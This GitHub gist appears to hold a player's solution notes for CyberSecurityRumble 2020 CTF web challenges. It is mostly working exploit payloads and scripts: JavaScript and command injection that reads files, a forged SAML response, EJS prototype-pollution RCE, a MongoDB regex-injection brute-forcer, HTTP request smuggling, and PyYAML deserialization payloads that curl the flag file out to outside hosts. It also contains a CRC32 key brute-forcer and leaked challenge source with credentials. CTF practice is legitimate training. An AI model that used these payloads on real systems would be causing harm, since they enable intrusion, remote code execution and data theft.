'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+' CSR{r363x_15_fun_r363x_15_l0v3}
Created
November 1, 2020 19:30
-
-
Save po6ix/b5885264ee0128e8f14bc293396081b5 to your computer and use it in GitHub Desktop.
CyberSecurityRumble-Solutions
http://chal.cybersecurityrumble.de:3812/management.html
rootpw1337
http://chal.cybersecurityrumble.de:3812/management.html?page=debug
8.8.8.8;cat super_secret_data.txt
CSR{oh_damnit_should_have_banned_curl_https://news.ycombinator.com/item?id=19507225}
- /file.php
<?php
session_start();
$filename = substr($_SERVER["DOCUMENT_URI"], 3);
if(!file_exists("/dev/shm/uploads/" . $filename) || strlen($filename) > 24) die("<h1>404 File not found</h1>");
if($_GET["report"] == "1") {
if(!file_exists("/dev/shm/reports")) mkdir("/dev/shm/reports");
if(!file_exists("/dev/shm/reports/" . $filename)) {
file_put_contents("/dev/shm/reports/" . $filename, "");
}
die("File has been reported, thanks for your help!");
}
header("Content-Security-Policy: script-src 'none';");
echo '<object border="2px" data="/uploads/' . $filename . '?lang=en&ref=website&pd=' . md5(session_id()) . '&u=' . uniqid() . '&client=' . session_id() . '&method=direct&t=' . time() . '"></object>';
echo '<br/><a href="?report=1">Report abuse</a>';
?>- add meta tag for redirect in svg and upload
- get session id from referer
- login and read note
CSR{N1C3_4ND-E4ZY-W4snT-1T?-:)}
samlify 1-day vulnerability
<saml:NameID SPNameQualifier="https://thejacktorrance.com/simplesaml/module.php/saml/sp/metadata.php/default-sp" Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">jack@torrance.com</saml:NameID>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_c1259570ad07995d795d826c32e6b2db243b44d78f" Version="2.0" IssueInstant="2020-11-01T06:06:42Z" Destination="https://thejacktorrance.com/sso/acs" InResponseTo="_315ecf2a-5f1a-43d9-97d8-339f892db1e4"><saml:Issuer>https://thejacktorrance.com/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_c1259570ad07995d795d826c32e6b2db243b44d78f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><ds:DigestValue>5Cq4Xbs0nbDDUA3q4oh2y362n6e3L896EKfemjQ3c0Y=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>ui+Y0Hxi7YnxjFSJiegla61qvfNmXk1F2w/5lBRXaUaNgvBNCwOTGm/qoYKgslYLQ4a2hRuxIZ33xEadr7Lu0JvVujgIi63CVQihqDJc8iUgLZimQiUxO0KavSXXTshWZWAxObagtOoSRra9bt0RnfN22XxPzViIOwoIy1FQ8rGS56qVrjsaJMtcK37CYH1yn5JlLiJidPCgUCGShleX6Cp2wBOGOHTSRW/wZdkE70Z9LgnL5KQLGE2/Udp2TIcaHf70INmgcCRqr3zPqQ7qEAZV6AtOoUerQQyPNmZ1Ufp4krYsiHHX9kmXvNAzPv7ALBUIEDiI5Ut/3BmgY0q2iZ/gIEs8JfJMF+MJJ86Vc/RxpRoxRqwuiybL1YnJ7oPMepeOTa/O9HXEyxKNgzwtoAJ5pAJI0qcwx8BjoLyH9uLzWGOPDv0N45D5Uin2mrRZSLvrIXZK8LNdWsgKtgu9SDVaQ40ln3AiJDNVAX1ALLEnINYAdzCmlQzZA6g5/UNS</ds:SignatureValue>
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIIFCzCCA3OgAwIBAgIUD/os2DmcSD+CQnuzPcTn+HwENf8wDQYJKoZIhvcNAQELBQAwgZQxCzAJBgNVBAYTAkRFMQ8wDQYDVQQIDAZIZXNzZW4xEjAQBgNVBAcMCUZyYW5rZnVydDEeMBwGA1UECgwVQ3liZXIgU2VjdXJpdHkgUnVtYmxlMRQwEgYDVQQDDAtmcmVha2VyLWlkcDEqMCgGCSqGSIb3DQEJARYbaW5mb0BjeWJlcnNlY3VyaXR5cnVtYmxlLmRlMB4XDTIwMTAyMTEzNTMwNloXDTMwMTAyMTEzNTMwNlowgZQxCzAJBgNVBAYTAkRFMQ8wDQYDVQQIDAZIZXNzZW4xEjAQBgNVBAcMCUZyYW5rZnVydDEeMBwGA1UECgwVQ3liZXIgU2VjdXJpdHkgUnVtYmxlMRQwEgYDVQQDDAtmcmVha2VyLWlkcDEqMCgGCSqGSIb3DQEJARYbaW5mb0BjeWJlcnNlY3VyaXR5cnVtYmxlLmRlMIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEA6NBOlyi7E2AZ41GSrCtNO6JcxUufjgZW3V/pZKQcDOMYcekxDdIn5W+K1/dPrTUBQ0x0azLLh6F5EGI9uyGUl0kxxHVeghWnpHEKdGzGIG3XrgZomq7jxLqp8xBXbKaAZ6rOBugw/4qa7f3saOfEz3pkzbAA4agOndfA95BCJh14c6KCaitrRIHjj4IQbZ9psMFnjMQsVEhKejKUX80EFbY5yqyYNDaaFDKVSbPYK/sk45wlPW6LE/ITEMB1SQIsiITMTFuhmueljNsBdg8nax1qbgF/CoKZW4ZYEhShQyQAbR4SRUzVU3IAJ+EqZ4xpO2TXcIZZJgqWAbXEhUkI7+BDshQAkBG4/Xh7lGqQ49AXmivpSYioHBm0qdbmK9TaxbYGbyCxrxd5g4E8tjR8WEu4kaXGjp5NFfOdQiKrD+DonFkYbZq2MuTQxvutLn7zKUfW4Mw3UrkD6p9Vvx9NLm0fhf/JNCAW04MSy7WeV9Dxs5YS7xzfLbVE/wT97VD1AgMBAAGjUzBRMB0GA1UdDgQWBBRHxoJWC7ZRAvZKRZ0Qw9OY0FqfCDAfBgNVHSMEGDAWgBRHxoJWC7ZRAvZKRZ0Qw9OY0FqfCDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBgQAi8EUI8E8IHyF4GL3XTEL8vJkDXCkpIziciy3h513zNpWcuaR3reWUFZtwfXDCbZ/Zkgq1/FDmxeEraC/p+2U2xnzNj/RH6szB2Rjx8iCb62/s9MtRACCAu/w5yWMhiHudzOMkLLyBi6UP9uI/9tuc2/xz7ERvgt7oK9cXZfySYsgppXXvbqzNF65CKLHUb2zSdLbVqKG8i4BrtgDebqnT8vanxB1yWsKe7Gstd4ZXeURlji9aPDnyvBOe+U5qDzF7PBF+trSZhX3e/CkWM2nZtpToAU90hpb9jxDQXs4m7QhPJTaFtyoi5LKdSGYq6AjVOpIk1RVie5YE10MNmiAn+UlDkbK6j4qO/HVEOpZEd0RhMgbV4oPgbIwaH7tNbJvS3ivIUF2edETyGiMVczwr9Gwh1NhZ2cl7sUhUZp1gcoLlcO8QBOVXretycFqzwP64XzZ8dsb/pgfWx3jQryfRQvi3i4G3MkQ4vj2NgPzeixCkPlyWcwdcXKvB6+VtuGY=</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_8d446455d688ab73ebd4d22ad0d72f584faeb4e8a5" Version="2.0" IssueInstant="2020-11-01T06:06:42Z"><saml:Issuer>https://thejacktorrance.com/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_8d446455d688ab73ebd4d22ad0d72f584faeb4e8a5"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><ds:DigestValue>lFqigZl6nTv4gJDx+AGU9z6fdanWrelGA5x/mIMlDo0=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>b1L3lbp3lYRZb0/dRPiSKQXGqY6yz1LenI5Nz3YCRtQRnWszguVMYw7c/WPCgV9460KkbFXhqNROZn/2K4GoKvR7iDdkk2vnmCTff+DyX4KDAWw4vieHBed5lgJIKAuSAwOTuV0XbXlD90/EoYbHcwX4nX41Gd1IQckLhXI07yxtvQnOFIGPmguXHK0oY0pLl4XUnzoOTL3EPg0Esh96+9qV/Cq3mRAiPjD5LaHjpUaH4Snc6w/JUX9QohqxdvJIdmjrTK6kyuKTDsuWovn61Jg9zTMt8Spd6kby1Mx3bf60RH9WlHn5/DK601OFcCNx1URBpIOAEMTWYDk+41Yh3EdQIgsRoVr6XdyjqJP4/zW5DDawXF1PezAjjeMfaRK0DkJRUuMOwcxnCLJJdEEilKgTVPWa4Gep2lTKH4qdXN2aHH/ihqmd8QDOhTG8V+hHh1dUHhwbzXdJjXZMOM9YPjvo50kiR4U819NNmBphvXkh2lkIise6qKZG1wtYWaFL</ds:SignatureValue>
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIIFCzCCA3OgAwIBAgIUD/os2DmcSD+CQnuzPcTn+HwENf8wDQYJKoZIhvcNAQELBQAwgZQxCzAJBgNVBAYTAkRFMQ8wDQYDVQQIDAZIZXNzZW4xEjAQBgNVBAcMCUZyYW5rZnVydDEeMBwGA1UECgwVQ3liZXIgU2VjdXJpdHkgUnVtYmxlMRQwEgYDVQQDDAtmcmVha2VyLWlkcDEqMCgGCSqGSIb3DQEJARYbaW5mb0BjeWJlcnNlY3VyaXR5cnVtYmxlLmRlMB4XDTIwMTAyMTEzNTMwNloXDTMwMTAyMTEzNTMwNlowgZQxCzAJBgNVBAYTAkRFMQ8wDQYDVQQIDAZIZXNzZW4xEjAQBgNVBAcMCUZyYW5rZnVydDEeMBwGA1UECgwVQ3liZXIgU2VjdXJpdHkgUnVtYmxlMRQwEgYDVQQDDAtmcmVha2VyLWlkcDEqMCgGCSqGSIb3DQEJARYbaW5mb0BjeWJlcnNlY3VyaXR5cnVtYmxlLmRlMIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEA6NBOlyi7E2AZ41GSrCtNO6JcxUufjgZW3V/pZKQcDOMYcekxDdIn5W+K1/dPrTUBQ0x0azLLh6F5EGI9uyGUl0kxxHVeghWnpHEKdGzGIG3XrgZomq7jxLqp8xBXbKaAZ6rOBugw/4qa7f3saOfEz3pkzbAA4agOndfA95BCJh14c6KCaitrRIHjj4IQbZ9psMFnjMQsVEhKejKUX80EFbY5yqyYNDaaFDKVSbPYK/sk45wlPW6LE/ITEMB1SQIsiITMTFuhmueljNsBdg8nax1qbgF/CoKZW4ZYEhShQyQAbR4SRUzVU3IAJ+EqZ4xpO2TXcIZZJgqWAbXEhUkI7+BDshQAkBG4/Xh7lGqQ49AXmivpSYioHBm0qdbmK9TaxbYGbyCxrxd5g4E8tjR8WEu4kaXGjp5NFfOdQiKrD+DonFkYbZq2MuTQxvutLn7zKUfW4Mw3UrkD6p9Vvx9NLm0fhf/JNCAW04MSy7WeV9Dxs5YS7xzfLbVE/wT97VD1AgMBAAGjUzBRMB0GA1UdDgQWBBRHxoJWC7ZRAvZKRZ0Qw9OY0FqfCDAfBgNVHSMEGDAWgBRHxoJWC7ZRAvZKRZ0Qw9OY0FqfCDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBgQAi8EUI8E8IHyF4GL3XTEL8vJkDXCkpIziciy3h513zNpWcuaR3reWUFZtwfXDCbZ/Zkgq1/FDmxeEraC/p+2U2xnzNj/RH6szB2Rjx8iCb62/s9MtRACCAu/w5yWMhiHudzOMkLLyBi6UP9uI/9tuc2/xz7ERvgt7oK9cXZfySYsgppXXvbqzNF65CKLHUb2zSdLbVqKG8i4BrtgDebqnT8vanxB1yWsKe7Gstd4ZXeURlji9aPDnyvBOe+U5qDzF7PBF+trSZhX3e/CkWM2nZtpToAU90hpb9jxDQXs4m7QhPJTaFtyoi5LKdSGYq6AjVOpIk1RVie5YE10MNmiAn+UlDkbK6j4qO/HVEOpZEd0RhMgbV4oPgbIwaH7tNbJvS3ivIUF2edETyGiMVczwr9Gwh1NhZ2cl7sUhUZp1gcoLlcO8QBOVXretycFqzwP64XzZ8dsb/pgfWx3jQryfRQvi3i4G3MkQ4vj2NgPzeixCkPlyWcwdcXKvB6+VtuGY=</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="https://thejacktorrance.com/simplesaml/module.php/saml/sp/metadata.php/default-sp" Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">wendy@torrance.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2020-11-01T06:11:42Z" Recipient="https://thejacktorrance.com/sso/acs" InResponseTo="_315ecf2a-5f1a-43d9-97d8-339f892db1e4"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2020-11-01T06:06:12Z" NotOnOrAfter="2020-11-01T06:11:42Z"><saml:AudienceRestriction><saml:Audience>https://thejacktorrance.com/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2020-11-01T06:06:42Z" SessionNotOnOrAfter="2020-11-01T14:06:42Z" SessionIndex="_b7c7a1ee6e38835376bd1675b5884349837559ddf3"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="uid" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">wendy</saml:AttributeValue></saml:Attribute><saml:Attribute Name="mail" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">wendy@torrance.com</saml:AttributeValue></saml:Attribute><saml:Attribute Name="eduPersonAffiliation" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">family</saml:AttributeValue><saml:AttributeValue xsi:type="xs:string">victim</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>import requests
import base64
import gzip, zlib
import urllib
import jwt
data = open('ex.saml').read()
data = base64.b64encode(data)
res = requests.post('https://thejacktorrance.com/sso/acs', data = {
'SAMLResponse': data
}, allow_redirects = False)
if not 'token=' in res.text:
print('[-] no token')
print(res.text)
exit()
begin = res.text.index('token=') + 6
token = res.text[begin:]
print(token)
print(repr(jwt.decode(token, verify=False)))
res = requests.get('https://thejacktorrance.com/verification?token={}'.format(urllib.quote(token)))
print(res.text)Ejs prototype pollution -> RCE
Object.prototype.outputFunctionName = 'x;<code>;x'
CSR{ReMemB3r_T0_s4ve_Th3_Pl4neT_t0d4y}
mongodb injection but many dummy there
import requests
for c1 in '0123456789abcdef':
for c2 in '0123456789abcdef':
for c3 in '0123456789abcdef':
try:
res = requests.get('http://chal.cybersecurityrumble.de:37585/secret_share?secid[$regex]=^.{}{}{}'.format(c1, c2, c3)).text
begin = res.index('<!-- secret will be placed here -->')
end = res.index('<!-- end secret -->')
if 'CSR' in res[begin+35:end]:
print(res[begin+35:end])
except:
print('no data')CSR{We_Call_Him_Little_Bobby_NoTables}
http smuggling with SEC-WEBSOCKET-KEY1
https://blog.deteact.com/gunicorn-http-request-smuggling/ https://github.com/0ang3el/websocket-smuggle
- save next packet by smuggling
/?save=[some token] - open
/debug/[token]
GET /debug/xxx HTTP/1.1
Host: chal.cybersecurityrumble.de:22001
Content-Length: 0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Origin: http://chal.cybersecurityrumble.de:22001
Content-Type: application/x-www-form-urlencoded
SEC-WEBSOCKET-KEY1: 999
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://chal.cybersecurityrumble.de:22001/
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=pybu3zheoyeupyzgodcrxf7oqc
Connection: close
aaaaaaaaPOST /?save=xxx HTTP/1.1
Host: chal.cybersecurityrumble.de:22001
Content-Type: application/x-www-form-urlencoded
Content-Length: 600
Connection: close
echo=aaaaaaaaaaaaa
flag{Fix_from_tom_on_irc._Thanks!https://github.com/benoitc/gunicorn/commit/a461817309b5393791f6239af5d5560cfa52e79f}
POST /wheel HTTP/1.1
Host: chal.cybersecurityrumble.de:7780
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Origin: http://chal.cybersecurityrumble.de:7780
DNT: 1
Connection: close
Referer: http://chal.cybersecurityrumble.de:7780/wheel
Cookie: PHPSESSID=8p9avljnqi1fe6t1hcfdslrsjk
Upgrade-Insecure-Requests: 1
name=&image_num=1&diameter=&config=!!python/object/apply:exec ['__import__("os").system("curl unsafe.bi.tk/{}".format(open("flag.py").read().encode().hex()))']
POST /wheel HTTP/1.1
Host: p6.is:5000
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _ga=GA1.2.382170462.1596459382
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
config=- !!python/object/new:yaml.MappingNode
listitems: !!str '!!python/object/apply:subprocess.Popen [["bash", "-c", "curl p6.is:4444 -F a=@flag.py"]]'
state:
tag: !!str dummy
value: !!str dummy
extend: !!python/name:yaml.unsafe_load
CSR{TH3_QU3STION_I5_WHY_WHY_CAN_IT_DO_THAT?!?}
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
//#include <openssl/md5.h>
#define BRUTEFORCE 0
// from https://wiki.osdev.org/CRC32
uint32_t poly8_lookup[256] =
{
0, 0x77073096, 0xEE0E612C, 0x990951BA,
0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988,
0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC,
0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172,
0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940,
0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116,
0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A,
0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818,
0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E,
0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C,
0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0,
0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086,
0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4,
0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A,
0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE,
0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC,
0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252,
0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60,
0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04,
0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A,
0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38,
0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E,
0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2,
0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0,
0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6,
0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94,
0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
};
uint32_t crc32(unsigned const char *data, size_t len, uint32_t hash)
{
hash = ~hash;
for(size_t i = 0; i < len; i++)
hash = (hash >> 8) ^ poly8_lookup[0xFF & (hash ^ data[i])];
return ~hash;
}
uint32_t hmac(unsigned char *data, size_t len, unsigned char *key)
{
unsigned char ipad[64];
unsigned char opad[64];
unsigned char k[64];
uint32_t md;
memset(ipad, 0x36, sizeof(ipad));
memset(opad, 0x5C, sizeof(ipad));
memset(k, 0x00, sizeof(k));
for(size_t i = 0; i < 4; i++) {
k[i] = key[i];
}
for(size_t i = 0; i < sizeof(opad); i++) {
opad[i] ^= k[i];
ipad[i] ^= k[i];
}
md = crc32(data, sizeof(ipad), crc32(ipad, sizeof(ipad), 0));
return crc32((char*)&md, sizeof(md), crc32(opad, sizeof(opad), 0));
}
int main(int argc, char *argv[])
{
unsigned char data[] = {
0x80, 0x04, 0x95, 0x40, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x8c, 0x06, 0x77, 0x65, 0x62,
0x61, 0x70, 0x70, 0x94, 0x8c, 0x04, 0x55, 0x73,
0x65, 0x72, 0x94, 0x93, 0x94, 0x29, 0x81, 0x94,
0x7d, 0x94, 0x28, 0x8c, 0x08, 0x75, 0x73, 0x65,
0x72, 0x6e, 0x61, 0x6d, 0x65, 0x94, 0x8c, 0x09,
0x78, 0x69, 0x73, 0x6f, 0x70, 0x31, 0x27, 0x22,
0x5c, 0x94, 0x8c, 0x0a, 0x70, 0x65, 0x72, 0x6d,
0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x94, 0x89,
0x75, 0x62, 0x2e
};
#if BRUTEFORCE
#pragma omp parallel for
for(size_t i = 0; i < 0x100000000ll; i++) {
uint32_t key = i;
uint32_t crc = hmac(data, sizeof(data), &key);
if(crc == 0xfa4d4a57)
printf("%08X\n", key);
}
#else
unsigned char key[] = {0x6B, 0xEA, 0xD5, 0x7C};
unsigned char buffer[4096];
ssize_t size;
size = read(0, buffer, sizeof(buffer));
if(size >= 0)
printf("%08X\n", hmac(buffer, size, key));
#endif
return EXIT_SUCCESS;
}Key is 6b ea d5 7c
It was not actually hmac, but salted hash
The salt is : \xDC\x0B\x53\xD3
- the source
POST / HTTP/1.1
Host: p6.is:4444
User-Agent: curl/7.64.0
Accept: */*
Content-Length: 4196
Content-Type: multipart/form-data; boundary=------------------------c8644242a31a3d0f
Expect: 100-continue
--------------------------c8644242a31a3d0f
Content-Disposition: form-data; name="a"; filename="out"
Content-Type: application/octet-stream
flask
gunicorn
mysql-connector-python
FLAG = "CSR{CRC_seems_to_be_linear_lol}"
KEY = b'\xdc\x0bS\xd3'
from flask import redirect, Flask, render_template, request, abort
from flask import url_for, send_from_directory, make_response, Response
import zlib
import os
import mysql.connector
import logging as log
import pickle
import secret
app = Flask(__name__)
class User:
pass
def MAC(pickled_user):
"""
Add message authentication code to user.
Since nobody knows the key, nobody can change it!
"""
return pickled_user.hex() + "-" + hex(zlib.crc32(secret.KEY + pickled_user))[2:]
def verify_mac(mac):
user, crc_value = mac.split("-")
crc_value = int(crc_value, 16)
user_b = bytes.fromhex(user)
valid_mac = zlib.crc32(secret.KEY + user_b)
if crc_value == valid_mac:
return pickle.loads(user_b)
raise ValueError("Bad CRC-HMAC!")
def mac_user(username):
user_obj = User()
user_obj.username = username
user_obj.permission = False
user_pickle = pickle.dumps(user_obj)
return MAC(user_pickle)
def check_user():
user_mac = request.cookies.get('user')
if user_mac is None:
return None
try:
user = verify_mac(user_mac)
except ValueError:
abort(Response("Bad CRC-HMAC!"))
return user
def connect_to_db():
conn = mysql.connector.connect(host="db", user='dbuser', password='123456', database='users')
cursor = conn.cursor()
return conn, cursor
def do_query(stmt, args, insert=False):
conn, cur = connect_to_db()
cur.execute(stmt, args)
if insert:
conn.commit()
res = None
else:
res = cur.fetchall()
cur.close()
conn.close()
return res
def do_insert(stmt, args):
do_query(stmt, args, True)
@app.route('/register', methods=["GET", "POST"])
def register():
user = check_user()
if user is not None:
return redirect(url_for('notes'))
msg = ""
if request.method == "POST":
try:
_, cursor = connect_to_db()
do_insert("INSERT INTO users (username, password) VALUES (%s, %s)", (request.form['username'], request.form['password']))
return redirect(url_for("login"))
except mysql.connector.IntegrityError:
msg = "User with that name already exists"
return render_template("register.html", msg=msg)
@app.route('/notes', methods=["GET", "POST"])
def notes():
user = check_user()
if user is None:
return redirect(url_for("register"))
if request.method == "POST":
try:
do_insert("INSERT INTO notes (content, username) VALUES (%s, %s)", (request.form['content'], user.username))
except mysql.connector.Error as ex:
log.error("Exception in notes: %s", str(ex))
res = do_query("SELECT content FROM notes WHERE username=%s", (user.username,))
notes = [x[0] for x in res]
return render_template("notes.html", notes=notes, dance=user.permission)
@app.route('/login', methods=["GET", "POST"])
def login():
msg = ""
if request.method == "POST":
try:
res = do_query("SELECT username, password FROM users WHERE username=%s AND password=%s", (request.form['username'], request.form['password']))
print(res)
if res is not None:
resp = make_response(redirect(url_for("notes")))
resp.set_cookie('user', mac_user(request.form['username']))
return resp
except mysql.connector.Error as ex:
msg = "Ooops. Something went wrong."
log.error("Exception in login: %s", str(ex))
else:
msg = "Invalid credentials!"
return render_template("login.html", msg=msg)
@app.route('/')
def index():
